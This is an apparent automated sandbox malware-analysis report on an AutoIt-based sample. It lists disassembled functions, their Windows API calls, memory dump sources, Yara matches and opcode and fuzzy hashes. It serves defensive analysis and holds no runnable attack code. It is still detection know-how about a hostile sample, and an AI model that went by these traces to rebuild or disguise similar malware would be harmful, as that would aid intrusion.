                                      • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 03CF3EE3
                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000), ref: 03CF3EE9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: 80f7c3c20f187a83e12885b6ba50243d9c53380cd9ee8f81ebdfaf8b43ff2323
                                      • Instruction ID: 892a2dc71052696db4930f5cac2a5fc05bb3c8f7733faf015fcde64a9189577b
                                      • Opcode Fuzzy Hash: 80f7c3c20f187a83e12885b6ba50243d9c53380cd9ee8f81ebdfaf8b43ff2323
                                      • Instruction Fuzzy Hash: 7D11B678654384BFE761DB74CC62F6EB7ECEB08710F624479F610EA1C0D6719A10A660
                                      Function 011D71D9 Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7221
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7230
                                      • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D724F
                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 011D7255
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: b662da7dfe0c0a757d22dfea999a3d1748300f09e28cbaf1b40ba4a321631cb9
                                      • Instruction ID: 276b57316b39087cf42b8f544092c835450a10d4b6f62ad929b41bb2f2828839
                                      • Opcode Fuzzy Hash: b662da7dfe0c0a757d22dfea999a3d1748300f09e28cbaf1b40ba4a321631cb9
                                      • Instruction Fuzzy Hash: 481170B0A04344BEE715DB78CC92F5DBBE8EF19714F2046A9F564E71D1D77569008720
                                      Function 011D71E1 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7221
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D7230
                                      • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,011D7270), ref: 011D724F
                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 011D7255
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: 26c939c3512850c9cc18b8553418a1a0485619999635100ce54f8a48772dffc8
                                      • Instruction ID: 7096fe016682f2ad30b572625a44bcdc7ab07e956bb4754db2905258fbf78774
                                      • Opcode Fuzzy Hash: 26c939c3512850c9cc18b8553418a1a0485619999635100ce54f8a48772dffc8
                                      • Instruction Fuzzy Hash: 581144B0614305BEE718EF78CC82F5DB7ECEB18714F604565B524E61D0E7756E008764
                                      Function 0081278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008149C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,008127AF,?,00000001), ref: 008149F4
                                      • _free.LIBCMT ref: 0084FB04
                                      • _free.LIBCMT ref: 0084FB4B
                                        • Part of subcall function 008129BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00812ADF
                                      Strings
                                      • Bad directive syntax error, xrefs: 0084FB33
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                      • String ID: Bad directive syntax error
                                      • API String ID: 2861923089-2118420937
                                      • Opcode ID: 71e125da9b433b31b24ed4bd49c1340fb41419558ba40853a088f5be9cfcbc27
                                      • Instruction ID: 1e1ed7e605db2d04a7254291030f207214c2dee75799be3d01672333e268b299
                                      • Opcode Fuzzy Hash: 71e125da9b433b31b24ed4bd49c1340fb41419558ba40853a088f5be9cfcbc27
                                      • Instruction Fuzzy Hash: A691707191022DAFCF04EFA8C8519EEBBB8FF15314F14442AF915EB2A2DB309945CB51
                                      Function 00869CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00814AB2: __fread_nolock.LIBCMT ref: 00814AD0
                                      • _wcscmp.LIBCMT ref: 00869DE1
                                      • _wcscmp.LIBCMT ref: 00869DF4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _wcscmp$__fread_nolock
                                      • String ID: FILE
                                      • API String ID: 4029003684-3121273764
                                      • Opcode ID: 094a275008508664fb80f3275e26085e74a69e5f2c99c49638229f747d302b9e
                                      • Instruction ID: f17606a902fa1e2ff99ea32b9c1480941c2568b599310f68a1e8af54b2cb2934
                                      • Opcode Fuzzy Hash: 094a275008508664fb80f3275e26085e74a69e5f2c99c49638229f747d302b9e
                                      • Instruction Fuzzy Hash: 1341E571A40219BADF219BA8CC45FEF77BDFF45710F01046AF940E7280D6B199448765
                                      Function 011D7B2D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxA.USER32(00000000,Executing manually will not work,011D7E19,00000000), ref: 011D7BC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Executing manually will not work$tdFBRmkc
                                      • API String ID: 2030045667-1191883203
                                      • Opcode ID: 91932bd5407034c11f17bca9de9d7144b0d15719f919ea9fd83d6b03d3b44e20
                                      • Instruction ID: bb3283323d6a57cd3cd2dfe3ef12bfb7db1e055cc840fe47eba4564e8e1ed9f8
                                      • Opcode Fuzzy Hash: 91932bd5407034c11f17bca9de9d7144b0d15719f919ea9fd83d6b03d3b44e20
                                      • Instruction Fuzzy Hash: 4121657461AB09AFDB0DEB60D892BDC73B5EBA830CF60447AE410A36C1DB349945CB13
                                      Function 008131BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0085032B
                                      • GetOpenFileNameW.COMDLG32(?), ref: 00850375
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                        • Part of subcall function 008209C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008209E4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen_memset
                                      • String ID: X
                                      • API String ID: 3777226403-3081909835
                                      • Opcode ID: 7f25d0c0af6cf879db9e8ee9c66dc7262c72c1094f5ca3d5015268aa5e35d2ef
                                      • Instruction ID: 6ca11da25fc4c50d9849d5fd6a05be9d520385d7609c63b984344d67384f996f
                                      • Opcode Fuzzy Hash: 7f25d0c0af6cf879db9e8ee9c66dc7262c72c1094f5ca3d5015268aa5e35d2ef
                                      • Instruction Fuzzy Hash: 0B219F71A002989BDF419F98D805BEE7BBCFF49305F00405AE904E7241DBB49A88DFA2
                                      Function 0087D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6641e1912ddd3ec61b99acebbffbca88814bd98d08b40f851785332c6a22efb
                                      • Instruction ID: 1740365c9062751776cbe72f9c6df1bfdc766ec7e4ed242ac118377872f51062
                                      • Opcode Fuzzy Hash: a6641e1912ddd3ec61b99acebbffbca88814bd98d08b40f851785332c6a22efb
                                      • Instruction Fuzzy Hash: DCF106B16083019FC714DF28C885A6ABBE5FF88314F14892EF999DB251D731E945CF92
                                      Function 00811680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: 86e7d957f919bdaccfc6ef1242d119d2f5d482c5631b219dbe878fc2b55dece2
                                      • Instruction ID: 9253dff3e97ea9a7eaf2f226ea8fc7eeaa6dee709ab55e3ceccd982ed7badab7
                                      • Opcode Fuzzy Hash: 86e7d957f919bdaccfc6ef1242d119d2f5d482c5631b219dbe878fc2b55dece2
                                      • Instruction Fuzzy Hash: EB61BE7160020DEBDF048F29D984AAA77B8FF54310F5585A9EC19CF399EB31D9A0CB51
                                      Function 0080AC2A Relevance: 4.6, APIs: 3, Instructions: 90comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0081FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00884186,00000001,00890980), ref: 0081FFA7
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0080AD08
                                      • OleInitialize.OLE32(00000000), ref: 0080AD85
                                      • CloseHandle.KERNEL32(00000000), ref: 00842F56
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                                      • String ID:
                                      • API String ID: 3815369404-0
                                      • Opcode ID: fed4d88d7e2977f7e2bf7ea76ffa901e2cd6c70f95edc2b49d925a87bdbff401
                                      • Instruction ID: 478949a03bb58be3e529bdddedb0009351b1d4b49fed014d460a2a280887a2e3
                                      • Opcode Fuzzy Hash: fed4d88d7e2977f7e2bf7ea76ffa901e2cd6c70f95edc2b49d925a87bdbff401
                                      • Instruction Fuzzy Hash: D14100B09092848EC389EF7EBC44E587BF8FB58310710826AE529C33B2EB304444CF5A
                                      Function 0082593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __FF_MSGBANNER.LIBCMT ref: 00825953
                                        • Part of subcall function 0082A39B: __NMSG_WRITE.LIBCMT ref: 0082A3C2
                                        • Part of subcall function 0082A39B: __NMSG_WRITE.LIBCMT ref: 0082A3CC
                                      • __NMSG_WRITE.LIBCMT ref: 0082595A
                                        • Part of subcall function 0082A3F8: GetModuleFileNameW.KERNEL32(00000000,008C53BA,00000104,00000004,00000001,00821003), ref: 0082A48A
                                        • Part of subcall function 0082A3F8: ___crtMessageBoxW.LIBCMT ref: 0082A538
                                        • Part of subcall function 008232CF: ___crtCorExitProcess.LIBCMT ref: 008232D5
                                        • Part of subcall function 008232CF: ExitProcess.KERNEL32 ref: 008232DE
                                        • Part of subcall function 00828D58: __getptd_noexit.LIBCMT ref: 00828D58
                                      • RtlAllocateHeap.NTDLL(00E90000,00000000,00000001,?,00000004,?,?,00821003,?), ref: 0082597F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                      • String ID:
                                      • API String ID: 1372826849-0
                                      • Opcode ID: e18f9e501008aafb79d427034be402ed9e251bf4250fb98b522f553c1e5a33b6
                                      • Instruction ID: 682a6956a5043504ad5fc11a2f8042b9ca2ef55d3426e719e6186c793fafd38f
                                      • Opcode Fuzzy Hash: e18f9e501008aafb79d427034be402ed9e251bf4250fb98b522f553c1e5a33b6
                                      • Instruction Fuzzy Hash: AD01F531282B36EBEA156728BC12B2E3658FF42770F100026F814EB2D1DE749DC14662
                                      Function 008692C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 008692D6
                                        • Part of subcall function 00822F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00829C54,00000000,00828D5D,008259C3), ref: 00822F99
                                        • Part of subcall function 00822F85: GetLastError.KERNEL32(00000000,?,00829C54,00000000,00828D5D,008259C3), ref: 00822FAB
                                      • _free.LIBCMT ref: 008692E7
                                      • _free.LIBCMT ref: 008692F9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                      • Instruction ID: fbc30877c91cf7a2f73145fdd2bbf88363f54d117387895434f564bb7cd49193
                                      • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                      • Instruction Fuzzy Hash: CEE012A160561267CA34A57C7A40E9377ECEFC8751716051EF459D7282CE34E8818169
                                      Function 00805E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CALL
                                      • API String ID: 0-4196123274
                                      • Opcode ID: 26b066d08d02b892a2f7c4f84367fa0e8281838baec20781bfa400909236c2ff
                                      • Instruction ID: 71a38f560a34bfc244df73313117f06fb637283de756ec2df1b50b62026ba91b
                                      • Opcode Fuzzy Hash: 26b066d08d02b892a2f7c4f84367fa0e8281838baec20781bfa400909236c2ff
                                      • Instruction Fuzzy Hash: 09325970508615DFCB64DF18C894A2AB7E1FF84304F15856DE88ADB3A2D735ECA5CB82
                                      Function 008148B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: EA06
                                      • API String ID: 4104443479-3962188686
                                      • Opcode ID: bb8e987b3e89ff7fa92529f16563dacd97aff8e8250bbaeeceb4c1923d235f5d
                                      • Instruction ID: 862d1bc4d56d308824e166c01778109e307f20c9749a03f4272f56d3b663da33
                                      • Opcode Fuzzy Hash: bb8e987b3e89ff7fa92529f16563dacd97aff8e8250bbaeeceb4c1923d235f5d
                                      • Instruction Fuzzy Hash: C9418961A0426C5BDF218B589C51BFF7FADFF51310F685074EC82EB296C6218DC887A2
                                      Function 03CF82D8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000000,?,?,?,?,03CF5166,?,03CEA59B,00000000,03CEA5FE,?,00000000,00000000,00000000,00000000,00000000), ref: 03CF831A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID: GetFileAttributesA
                                      • API String ID: 3188754299-811605020
                                      • Opcode ID: 5f5bb04583afd837e0cc1862a8675ee99935cbaaa5ba2e1cdbe674b8463bb02f
                                      • Instruction ID: 572ab16c5a98aa26c86a2f27aa20c4f06d0c38d992d6c578d081c12773b2f4a0
                                      • Opcode Fuzzy Hash: 5f5bb04583afd837e0cc1862a8675ee99935cbaaa5ba2e1cdbe674b8463bb02f
                                      • Instruction Fuzzy Hash: 70F0CD34604344EFDB95EBB9CCA596DB3E8EB08320BD54878E608D62A0D770AA08E610
                                      Function 03CF7D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?,03CF7DFA,00000000,03CF7E12,?,?,?,?,03CF5171,?,03CEA59B), ref: 03CF7D98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID: CreateDirectoryA
                                      • API String ID: 4241100979-2169353901
                                      • Opcode ID: 06df423d2dde60eac333c5d7127977fc8cb2363dd3435e61f0f95e23b4c141f6
                                      • Instruction ID: fa42f1e06f91c22cfc5a024e6634de473f55a9f693cce5f416bdd936373ba8ee
                                      • Opcode Fuzzy Hash: 06df423d2dde60eac333c5d7127977fc8cb2363dd3435e61f0f95e23b4c141f6
                                      • Instruction Fuzzy Hash: D6F08C7A604384BFD756EBAACC62D6EB7ECEB48650BD24474F600C3200DB70AE00A620
                                      Function 03CF7BE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • TerminateProcess.KERNELBASE(00000000,00000000,?,00000001,03CF76E2,03CEFEEC,00000000,00000000,00000002,00000000,00000000,00000000,00000002,00000000,03CF0200,00000000), ref: 03CF7C01
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID: TerminateProcess
                                      • API String ID: 560597551-2873147277
                                      • Opcode ID: d8204e1a847422ebc87caf355f2e6269d42be7f0c8643ad5edbcae399f84fcbe
                                      • Instruction ID: 388e2063468b9e54bc2ba355b2f53d0e046193661250f83a79e7228bebfdb977
                                      • Opcode Fuzzy Hash: d8204e1a847422ebc87caf355f2e6269d42be7f0c8643ad5edbcae399f84fcbe
                                      • Instruction Fuzzy Hash: 11C04CB36166206F9760A7E96C88CAB6ADCDAA91A13044461B615D3305DA644C1067B0
                                      Function 00820FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0082593C: __FF_MSGBANNER.LIBCMT ref: 00825953
                                        • Part of subcall function 0082593C: __NMSG_WRITE.LIBCMT ref: 0082595A
                                        • Part of subcall function 0082593C: RtlAllocateHeap.NTDLL(00E90000,00000000,00000001,?,00000004,?,?,00821003,?), ref: 0082597F
                                      • std::exception::exception.LIBCMT ref: 0082101C
                                      • __CxxThrowException@8.LIBCMT ref: 00821031
                                        • Part of subcall function 008287CB: RaiseException.KERNEL32(?,?,?,008BCAF8,?,?,?,?,?,00821036,?,008BCAF8,?,00000001), ref: 00828820
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 3902256705-0
                                      • Opcode ID: 63b7841c3306f99c2d95ad87faeab53f6632baa5133a582594c9f67cf74b179b
                                      • Instruction ID: d0fc9716191ed922ff4dd2c7d265e10d17ba4971e79d35338a2858119a7cd1eb
                                      • Opcode Fuzzy Hash: 63b7841c3306f99c2d95ad87faeab53f6632baa5133a582594c9f67cf74b179b
                                      • Instruction Fuzzy Hash: 1FF06D3554462DA6CF20BA9CF91999E7BA8FF01314F240465F914D2291DFB18BC486A6
                                      Function 0082581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
